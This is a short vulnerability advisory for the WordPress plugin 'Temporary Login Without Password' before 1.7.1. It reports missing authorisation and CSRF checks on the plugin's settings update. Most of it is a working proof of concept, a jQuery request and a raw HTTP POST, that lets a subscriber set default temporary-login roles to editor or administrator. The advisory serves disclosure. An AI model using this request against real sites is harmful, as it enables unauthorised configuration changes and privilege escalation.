Temporary Login Without Password < 1.7.1 - Subscriber+ Plugin's Settings Update

The plugin does not have authorisation and CSRF checks when updating its settings, which could allows any logged-in users, such as subscribers to update them

PoC

jQuery.post(“https://example.com/wp-admin/index.php”, { “wtlwp-nonce”: “foo”, // Not validated tlwp_settings_data: { default_role: “editor”, default_expiry_time: “month_after_access”, visible_roles: [“editor”, “administrator”], default_redirect_to: “wp_dashboard” } }) POST /wp-admin/index.php HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 288 Connection: close Cookie: [subscriber+] wtlwp-nonce=foo&tlwp;_settings_data%5Bdefault_role%5D=editor&tlwp;_settings_data%5Bdefault_expiry_time%5D=month_after_access&tlwp;_settings_data%5Bvisible_roles%5D%5B%5D=editor&tlwp;_settings_data%5Bvisible_roles%5D%5B%5D=administrator&tlwp;_settings_data%5Bdefault_redirect_to%5D=wp_dashboard